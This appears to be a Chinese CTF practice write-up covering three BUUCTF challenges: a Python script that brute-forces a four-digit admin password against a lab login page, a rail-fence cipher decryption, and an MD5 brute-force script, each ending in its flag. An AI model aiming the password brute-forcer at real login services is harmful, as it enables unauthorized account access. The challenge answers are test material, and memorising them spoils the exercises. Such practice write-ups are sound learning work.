CTF 练习22.1.10
BUU BRUTE 1
一个比较简单的暴力密码破解,直到现在我还在爆破。
#http://5a387db8-62d8-467d-a9d7-66b0ff6fd51e.node4.buuoj.cn:81/?username=admin&password=1234
import time
import requests
headers={
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36",
}
url = 'http://5a387db8-62d8-467d-a9d7-66b0ff6fd51e.node4.buuoj.cn:81/'
f=open('./test.txt', 'w')
for i in range(0,10000):
try:
print(str(i).zfill(4))
params = {"username": "admin","password":str(i).zfill(4)}
response = requests.get(url=url, params=params, headers=headers).text
print(str(i)+response, file=f)
print(response)
# time.sleep(0)
if(response!="密码错误,为四位数字。"):
time.sleep(1)
response = requests.get(url=url, params=params, headers=headers).text
print(str(i)+response, file=f)
print(response)
except:
print("error!")
time.sleep(1)
#00516490登录成功。flag{dc563b29-4f7f-4e06-9864-b93730da2614}
6490登录成功。flag{dc563b29-4f7f-4e06-9864-b93730da2614}篱笆墙的影子
题目描述:
星星还是那颗星星哟 月亮还是那个月亮 山也还是那座山哟 梁也还是那道梁 碾子是碾子 缸是缸哟 爹是爹来娘是娘 麻油灯呵还吱吱响 点的还是那么丁点亮 哦哦 注意:得到的 flag 请包上 flag{} 提交星星还是那颗星星哟 月亮还是那个月亮 山也还是那座山哟 梁也还是那道梁 碾子是碾子 缸是缸哟 爹是爹来娘是娘 麻油灯呵还吱吱响 点的还是那么丁点亮 哦哦 注意:得到的 flag 请包上 flag{} 提交
下载的文件:
felhaagv{ewtehtehfilnakgw}
考虑篱笆和栏珊差不多意思
可得
分为2栏,解密结果为:flag{wethinkwehavetheflag}丢失的MD5
题目描述:
注意:得到的 flag 请包上 flag{} 提交import hashlib
for i in range(32,127):
for j in range(32,127):
for k in range(32,127):
m=hashlib.md5()
m.update('TASC'+chr(i)+'O3RJMV'+chr(j)+'WDJKX'+chr(k)+'ZM')
des=m.hexdigest()
if 'e9032' in des and 'da' in des and '911513' in des:
print des看了一下代码,可以直接运行,一个小坑,需要用python2.7运行(安利下用docker里面弄个1804)
root@cb7c2e25b2df:~# vim waaa.py
root@cb7c2e25b2df:~# python waaa.py
e9032994dabac08080091151380478a2
root@cb7c2e25b2df:~#得到flag{e9032994dabac08080091151380478a2}